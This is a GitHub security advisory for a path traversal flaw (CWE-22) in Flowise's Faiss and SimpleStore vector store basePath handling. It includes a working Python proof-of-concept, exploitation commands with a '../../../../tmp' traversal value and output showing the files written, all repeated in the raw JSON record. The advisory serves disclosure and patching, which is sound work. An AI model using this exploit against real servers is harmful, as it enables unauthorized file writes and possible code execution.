GHSA-W6V6-49GH-MC9W

Vulnerability from github – Published: 2026-04-16 21:22 – Updated: 2026-04-16 21:22
VLAI?
Summary
Flowise: Path Traversal in Vector Store basePath
Details

Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a basePath parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

Vulnerability Details

Field Value
Affected File packages/components/nodes/vectorstores/Faiss/Faiss.ts (lines 79, 91)
Affected File packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts (lines 83-104)

Prerequisites

  1. Authentication: Valid API token with documentStores:upsert-config permission
  2. Document Store: An existing Document Store with at least one processed chunk
  3. Embedding Credentials: Valid embedding provider credentials (e.g., OpenAI API key)

Root Cause

Faiss (Faiss.ts)

async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    // ...
    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
    await vectorStore.save(basePath)  // Direct filesystem write, no validation
}

SimpleStore (SimpleStore.ts)

async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled

    let filePath = ''
    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
    else filePath = basePath  // Used directly without sanitization

    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path
}

Impact

An authenticated attacker can:

  1. Write files to arbitrary locations on the server filesystem
  2. Overwrite existing files if the process has write permissions
  3. Potential for code execution by writing to web-accessible directories or startup scripts
  4. Data exfiltration by writing to network-mounted filesystems

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
  python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""

import argparse
import json
import urllib.request
import urllib.error

def post_json(url, data, headers):
    req = urllib.request.Request(
        url,
        data=json.dumps(data).encode("utf-8"),
        headers={**headers, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=120) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True)
    ap.add_argument("--token", required=True)
    ap.add_argument("--store-id", required=True)
    ap.add_argument("--credential", required=True)
    ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
    args = ap.parse_args()

    payload = {
        "storeId": args.store_id,
        "vectorStoreName": "faiss",
        "vectorStoreConfig": {"basePath": args.base_path},
        "embeddingName": "openAIEmbeddings",
        "embeddingConfig": {"credential": args.credential},
    }

    url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
    headers = {"Authorization": f"Bearer {args.token}"}

    try:
        status, body = post_json(url, payload, headers)
        print(body)
    except urllib.error.HTTPError as e:
        print(e.read().decode())

if __name__ == "__main__":
    main()

Setup

  1. Create a Document Store in Flowise UI
  2. Add a Document Loader (e.g., Plain Text) with any content
  3. Click "Process" to create chunks
  4. Note the Store ID from the URL
  5. Get your embedding credential ID from Settings → Credentials

Exploitation

# Write to /tmp
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path "../../../../tmp/traversal-test"

Evidence

$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned

{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .
drwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..
-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json
-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index
Severity ?
4.9 (Medium)
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise-components"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:22:49Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |\n| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |\n\n## Prerequisites\n\n1. **Authentication**: Valid API token with `documentStores:upsert-config` permission\n2. **Document Store**: An existing Document Store with at least one processed chunk\n3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)\n\n## Root Cause\n\n### Faiss (`Faiss.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise\u003cPartial\u003cIndexingResult\u003e\u003e {\n    const basePath = nodeData.inputs?.basePath as string  // User-controlled\n    // ...\n    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)\n    await vectorStore.save(basePath)  // Direct filesystem write, no validation\n}\n```\n\n### SimpleStore (`SimpleStore.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise\u003cPartial\u003cIndexingResult\u003e\u003e {\n    const basePath = nodeData.inputs?.basePath as string  // User-controlled\n    \n    let filePath = \u0027\u0027\n    if (!basePath) filePath = path.join(getUserHome(), \u0027.flowise\u0027, \u0027llamaindex\u0027)\n    else filePath = basePath  // Used directly without sanitization\n    \n    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path\n}\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n1. **Write files to arbitrary locations** on the server filesystem\n2. **Overwrite existing files** if the process has write permissions\n3. **Potential for code execution** by writing to web-accessible directories or startup scripts\n4. **Data exfiltration** by writing to network-mounted filesystems\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Path Traversal in Vector Store basePath (CWE-22)\n\nUsage:\n  python poc.py --target http://localhost:3000 --token \u003cAPI_KEY\u003e --store-id \u003cSTORE_ID\u003e --credential \u003cEMBEDDING_CREDENTIAL_ID\u003e\n\"\"\"\n\nimport argparse\nimport json\nimport urllib.request\nimport urllib.error\n\ndef post_json(url, data, headers):\n    req = urllib.request.Request(\n        url,\n        data=json.dumps(data).encode(\"utf-8\"),\n        headers={**headers, \"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    with urllib.request.urlopen(req, timeout=120) as resp:\n        return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--target\", required=True)\n    ap.add_argument(\"--token\", required=True)\n    ap.add_argument(\"--store-id\", required=True)\n    ap.add_argument(\"--credential\", required=True)\n    ap.add_argument(\"--base-path\", default=\"/tmp/flowise-path-traversal-poc\")\n    args = ap.parse_args()\n\n    payload = {\n        \"storeId\": args.store_id,\n        \"vectorStoreName\": \"faiss\",\n        \"vectorStoreConfig\": {\"basePath\": args.base_path},\n        \"embeddingName\": \"openAIEmbeddings\",\n        \"embeddingConfig\": {\"credential\": args.credential},\n    }\n\n    url = args.target.rstrip(\"/\") + \"/api/v1/document-store/vectorstore/insert\"\n    headers = {\"Authorization\": f\"Bearer {args.token}\"}\n\n    try:\n        status, body = post_json(url, payload, headers)\n        print(body)\n    except urllib.error.HTTPError as e:\n        print(e.read().decode())\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Setup\n\n1. Create a Document Store in Flowise UI\n2. Add a Document Loader (e.g., Plain Text) with any content\n3. Click \"Process\" to create chunks\n4. Note the Store ID from the URL\n5. Get your embedding credential ID from Settings \u2192 Credentials\n\n### Exploitation\n\n```bash\n# Write to /tmp\npython poc.py \\\n  --target http://127.0.0.1:3000 \\\n  --token \u003cAPI_TOKEN\u003e \\\n  --store-id \u003cSTORE_ID\u003e \\\n  --credential \u003cOPENAI_CREDENTIAL_ID\u003e \\\n  --base-path /tmp/flowise-pwned\n\n# Path traversal variant\npython poc.py \\\n  --target http://127.0.0.1:3000 \\\n  --token \u003cAPI_TOKEN\u003e \\\n  --store-id \u003cSTORE_ID\u003e \\\n  --credential \u003cOPENAI_CREDENTIAL_ID\u003e \\\n  --base-path \"../../../../tmp/traversal-test\"\n```\n\n### Evidence\n\n```\n$ python poc.py --target http://127.0.0.1:3000/ --token \u003cTOKEN\u003e --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned\n\n{\"numAdded\":1,\"addedDocs\":[{\"pageContent\":\"Lorem Ipsum\",\"metadata\":{\"docId\":\"d84d9581-0778-454d-984e-42b372b1b555\"}}],\"totalChars\":0,\"totalChunks\":0,\"whereUsed\":[]}\n\n$ ls -la /tmp/flowise-pwned/\ntotal 16\ndrwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .\ndrwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..\n-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json\n-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index\n```",
  "id": "GHSA-w6v6-49gh-mc9w",
  "modified": "2026-04-16T21:22:49Z",
  "published": "2026-04-16T21:22:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Flowise: Path Traversal in Vector Store basePath"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.